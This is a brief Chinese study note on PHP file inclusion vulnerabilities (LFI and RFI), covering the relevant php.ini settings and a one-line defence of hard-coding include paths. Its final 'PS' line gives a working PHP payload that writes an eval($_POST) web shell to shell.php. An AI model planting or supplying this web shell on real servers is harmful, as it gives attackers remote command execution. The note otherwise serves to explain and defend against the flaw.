文件包含使得web服务器能够执行引用的文件,从而带来安全风险。相比文件上传,上传带恶意脚本的jpg文件只要不被执行,就不会有问题。结合文件包含漏洞使用,恶意文件就会变得危险。LFI
而RFI相当于文件上传 + LFI
配置文件php.ini
allow_url_fopen = On (允许打开URL文件,预设启用)
allow_url_fopen = Off (禁止打开URL文件)
allow_url_include = Off (禁止引用URL文件,新版增加功能,预设关闭)
allow_url_include = On (允许引用URL文件,新版增加功能)
防御:
代码写死
PS:
<?fputs(fopen("shell.php","w"),'<?php eval($_POST[pass]);?>')?> 执行后产生内容为 <?php eval($_POST[pass]);?>的 shell.php的文件